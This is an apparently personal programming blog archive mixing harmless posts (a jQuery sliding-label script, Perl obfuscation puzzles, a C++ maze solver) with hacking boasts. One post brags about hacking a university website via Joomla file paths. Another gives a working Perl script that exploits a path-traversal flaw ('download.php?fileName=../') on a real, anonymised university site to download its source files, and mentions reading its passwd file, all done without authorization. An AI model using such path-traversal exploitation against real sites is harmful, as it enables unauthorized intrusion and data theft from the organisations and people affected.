Archive for the Programming Category

Joomla CMS directory/file structure

Posted in Programming, Tools with tags , , on April 22, 2011 by Xacker

I needed to check Joomla CMS directories & files structure to learn about the paths of sensitive files e.g. “configuration.php”

I found the following website which I can use to see even the source code of each file in Joomla, with syntax highlighting and much more.

I hope it helps someone else hack a university website like I just did half an hour ago 😉

http://www.reference.joomlademo.de/index.html

~ Xacker

Sliding Label with jQuery

Posted in JavaScript with tags , , , on October 26, 2010 by Xacker

Sliding Label with jQuery

I was using Sliding Label mooTools version for a while but when I had alot of jQuery scripts running up in one of my pages; it wasn’t that smart to include another library too.. obviously because it’s resource-consuming; so I wrote this small version for jQuery.

What is Sliding Label? an effect on input fields where the label slides out of it when the input gets the focus.. not clear enough? here is an example:

It’s a nice effect actually and I use it often.

The code:

$(document).ready(function ()
{
    var labelColor = '#999',
        restingPosition = 85;

    $("form#login_form .slider label").each(function ()
    {
        var label = $(this);
        var input = label.next("input");

        label.css(
        {
            'color': labelColor,
            'position': 'absolute',
            'top': 7,
            'left': restingPosition,
            'display': 'inline',
            'z-index': 1
        });

        var width = label.width();
        var move = restingPosition;

        if (input.val() !== '')
        {
            label.animate(
            {
                "left": "-=" + move + "px"
            }, "slow");
        }

        input.bind(
        {
            focus: function ()
            {
                if (input.val() == '')
                {
                    label.animate(
                    {
                        'left': '-=' + move + "px"
                    }, 'normal');
                    label.css(
                    {
                        'color': '#000'
                    });
                }
            },
            blur: function ()
            {
                if (input.val() == '')
                {
                    label.animate(
                    {
                        'left': '+=' + restingPosition + "px"
                    }, 'normal');
                    label.css(
                    {
                        'color': labelColor
                    });
                }
            }
        });
    });
});
Here is a complete example.

Enjoy, and stay tuned for more jQuery codes 🙂

Simple SMTP Client

Posted in C# with tags , , , , on October 25, 2010 by Xacker

In the Network Services course at the college I had to write a pseudo code to demonstrate how SMTP clients communicate with SMTP servers to send emails over SMTP protocol.

Since I hate writing a pseudo code for such simple application I’ve decided to use C# .NET

Notes:

  1. The SMTP server is set up on a virtual machine, that explains the “192.168.184.2”
  2. The SMTP clients doesn’t support secure communications for SMTP authentication, it was meant to be as simple as possible.
  3. I use Regular Expressions to run some validations and do Dot Stuffing that is required by SMTP if your Content-Transfer-Encoding was set to “7bit”

Continue reading

Obfuscation

Posted in Programming, Security with tags , on February 19, 2009 by Xacker

You can obfuscate “XACKER” to stdout using different programming languages but .. it would still be recognizable don’t you think?

How about obfuscating it with Perl?

''=~('(?{'.('//)@*~'^'_]@.^^').'"'.('%!|`%}_'^'}`?+`/}').',$/})')

that’s it, I’m ‘con‘fuscated now 😮

Of course this is not the first time to be done.. I don’t mean obfuscating “XACKER” 😀 no, I mean obfuscation with Perl.. there has been since Perl existed alot of obfuscation contests, something like this, which prints “just another perl hacker”

$_ = "wftedskaebjgdpjgidbsmnjgc";
tr/a-z/oh, turtleneck Phrase Jar!/; print;

Simple? OK how about this (I swear it prints “just another perl hacker” !)

#!/usr/bin/perl
not exp log srand xor s qq qx xor
s x x length uc ord and print chr
ord for qw q join use sub tied qx
xor eval xor print qq q q xor int
eval lc q m cos and print chr ord
for qw y abs ne open tied hex exp
ref y m xor scalar srand print qq
q q xor int eval lc qq y sqrt cos
and print chr ord for qw x printf
each return local x y or print qq
s s and eval q s undef or oct xor
time xor ref print chr int ord lc
foreach qw y hex alarm chdir kill
exec return y s gt sin sort split

You still think it’s simple? try the ultimate JAPH:

                                                #
                                            sub j(\$){($
              P,$V)=                      @_;while($$P=~s:^
          ([()])::x){                    $V+=(‘(‘eq$1)?-32:31
    }$V+=ord(  substr(                 $$P,0,1,””))-74} sub a{
   my($I,$K,$  J,$L)=@_               ;$I=int($I*$M/$Z);$K=int(
  $K*$M/$Z);$J=int($J*$M             /$Z);$L=int($L*$M/$Z); $G=$
  J-$I;$F=$L-$K;$E=(abs($          G)>=abs($F))?$G:$F;($E<0) and($
   I,$K)=($J,$L);$E||=.01       ;for($i=0;$i< =abs$E;$i++ ){ $D->{$K
           +int($i*$F/$E)      }->{$I+int($i*$G/$E)}=1}}sub p{$D={};$
          Z=$z||.01;map{    $H=$_;$I=$N=j$H;$K=$O=j$H;while($H){$q=ord
         substr($H,0,1,”” );if(42==$q){$J=j$H;$L=j$H}else{$q-=43;$L =$q
       %9;$J=($q-$L)/9;$L=$q-9*$J-4;$J-=4}$J+=$I;$L+=$K;a($I,$K,$J,$ L);
       ($I,$K)=($J,$L)}a($I,$K,$N,$O)}@_;my$T;map{$y=$_;map{ $T.=$D->{$y}
       ->{$_}?$\:’ ‘}(-59..59);$T.=”\n”}(-23..23);print”\e[H$T”}$w= eval{
       require Win32::Console::ANSI};$b=$w?’1;7;’:””;($j,$u,$s,$t,$a,$n,$o
       ,$h,$c,$k,$p,$e,$r,$l,$C)=split/}/,’Tw*JSK8IAg*PJ[*J@wR}*JR]*QJ[*J’.
        ‘BA*JQK8I*JC}KUz]BAIJT]*QJ[R?-R[e]\RI’.’}Tn*JQ]wRAI*JDnR8QAU}wT8KT’.
        ‘]n*JEI*EJR*QJ]*JR*DJ@IQ[}*JSe*JD[n]*JPe*’.’JBI/KI}T8@?PcdnfgVCBRcP’.
         ‘?ABKV]]}*JWe*JD[n]*JPe*JC?8B*JE};Vq*OJQ/IP[‘.’wQ}*JWeOe{n*EERk8;’.
           ‘J*JC}/U*OJd[OI@*BJ*JXn*J>w]U}CWq*OJc8KJ?O[e]U/T*QJP?}*JSe*JCnTe’.
            ‘QIAKJR}*JV]wRAI*J?}T]*RJcJI[\]3;U]Uq*PM[wV]W]WCT*DM*SJ’.  ‘ZP[Z’.
               ‘PZa[\]UKVgogK9K*QJ[\]n[RI@*EH@IddR[Q[]T]T]T3o[dk*JE’.  ‘[Z\U’.
                 ‘{T]*JPKTKK]*OJ[QIO[PIQIO[[gUKU\k*JE+J+J5R5AI*EJ00’.  ‘BCB*’.
                      ‘DMKKJIR[Q+*EJ0*EK’;sub h{$\ = qw(% & @ x)[int    rand
                       4];map{printf  “\e[$b;%dm”,int(rand 6)+101-60*   ($w
                        ||0);system(  “cls”)if$w ;($A,$S)=    ($_[1],   $
                         _[0]);($M,   @,)= split  ‘}’;for(     $z=256
                         ;$z>0; $z   -=$S){$S*=   $A;p @,}      sleep$_
                         [2];while   ($_[3]&&($    z+=$ S)       <=256){                          p@,}}("".   "32}7D$j"     ."}AG".       "$u}OG"                          ."$s}WG"    ."$t",""      ."24}("        ."IJ$a"                          ."}1G$n"    ."}CO$o"     ."}GG$t"        ."}QC"                           ."$h}"      ."^G$e"    ."})IG"          ."$r",                           "32}?"       ."H$p}FG$e}QG$r".          "}ZC"                           ."$l",          "28}(LC" .""            ."".                           "$h}:"           ."J$a}EG".             "$c"                           ."}M"             ."C$k}ZG".            "$e"                           ."}"             ."dG$r","18"          ."}("                          ."D;"            ."$C"  )}{h(16         ,1,1,0                         );h(8,          .98,0,0   );h(16         ,1,1,1)                         ;h(8.0         ,0.98,0,     1);         redo}###                       #written                                 060204 by                     #liverpole                                  @@@@@@@                  #@@@@@@@@@@@ [/sourcecode]

Script source code disclosure could mean full compromising

Posted in Programming, Security with tags , , , on February 18, 2009 by Xacker

Hello,

I have been playing lately with some websites security since it was extremely bored for me after finishing my exams to have nothing better to do.. yeah I know I still got to finish the CCNA course and get over with that but call me lazy I’ve wasted alot of valuable time 😦

Never mind that for a second, what I bring to you today is a closer look on websites security and what could a simple human error do with your website.

Take for example our website today, http://vulnerable.edu.xx [Link kept private for.. well, I might have some black hat touch here but I still don’t want anyone to compromise the website for fun! as we all know, it was always for “educational purposes only” :D] — the website appeared to be vulnerable to Script source code disclosure which entitled me to have a copy of every single file on the website that appeared on my crawler, including the famous ‘passwd‘ file [unfortunately the passwords were kept encrypted in the ‘shadow‘ file 😦 — wasn’t hard to guess the path once I got the ability to get any file :)]

So with a fast dirty perl code I wrote on a rush (took me about half an hour to learn some basics) I managed to download a copy of my beloved PHP files that were located on that host 🙂

use LWP 5.64;
use strict;
use File::Basename;

my $browser = LWP::UserAgent->new;

open (handle, 'files.txt');
mkdir "site";
chdir "./site";
while (< handle >) { #remove the spaces between handle and <>, WP parser sucks
    chomp;
    my ($filename,$directories) = fileparse("$_");
    my @dir = split('/',$directories);
    my $i = 0;
    while (@dir[$i]) {
        mkdir @dir[$i];
        chdir './'.@dir[$i];
        $i = $i + 1;
    }
    $i = $i - 1;

    my $url = 'http://vulnerable.edu.xx/common/download.php?'
    $url .= 'fileName=../' . $directories . $filename;
    print "working on " . $url ."\n";

    my $response = $browser->get($url);
    die "Can't get $url -- ", $response->status_line
    unless $response->is_success;
    die "Hey I was expecting PHP, not ", $response->content_type
    unless $response->content_type eq 'application/download';

    open (file, '>'.$filename) or die "Can't create file '$filename'";
    print file $response->content;
    close(file);

    print "saving " . $directories . $filename . "\n";

    for ($i; $i >= 0; $i--) {
        chdir('../');
    }
}
just an example, one of the folders :)

just an example, one of the folders 🙂

let’s hope it’s not your site 😀

Finding a path in a maze using C++

Posted in Programming with tags , , on February 9, 2009 by Xacker

How to solve a maze with C++ ?

The following picture represents a simple maze of 10*10 blocks. Note that our program will take a maximum of 40*40 dimensions for example, this picture is only to simplify your imagination process 🙂
The maze will be represented by a 2 dimensional array.

maze

Functions definitions:

  1. main() is the main program, that is used to call all other functions.
  2. setCoord() is an void type function, that takes 2 params, number of rows and cols of the the maze.
  3. fillMaze() is a void type function, that takes 3 params, a maze ptr, number of its rows and cols.
  4. valMaze() is an integer type function, that takes 5 params, a maze ptr, number of its rows and cols, an eNtry(x,y) ptr, an eXit(x,y) ptr.
  5. findPos() is an integer type function, that takes 5 params, a maze ptr, number of its rows and cols, (x,y) ptr, accum num.
  6. /* additional functions will be added later */

I’m gonna present the program as functions first then glue everything together at the end to avoid complixity.

I would like also to take this chance to thank the following people who have helped me a lot with this progress: خالد الشايع, TheNapsterBoy, علي الشمري, عمر العادل.

Caution: WordPress source code parser SUCKS, danger of falling asteroids! use helmets as precaution 😛

/*	gets the width and height of the maze
	checking for the allowed range */
void setCoord(int &nrows,int &ncols) {
	if (ncols < = 0 || ncols > 40) {
		printf ("Enter maze width: ");
		scanf_s  ("%d",&ncols);
	}
	if (nrows < = 0 || nrows > 40) {
		printf ("Enter maze height: ");
		scanf_s  ("%d",&nrows);
	}
	if (nrows < = 0 || nrows > 40 || ncols < = 0 || ncols > 40) {
		printf  ("Invalid width or height detected\n\n");
		setCoord(nrows,ncols);	// recursive call
	}
}

Continue reading

Microsoft Press Books of the Month

Posted in Books, Networks, Programming with tags , , , , , on January 26, 2009 by Xacker


Password: xacker.wordpress.com

I will fix the links of the previous books on my blog soon 🙂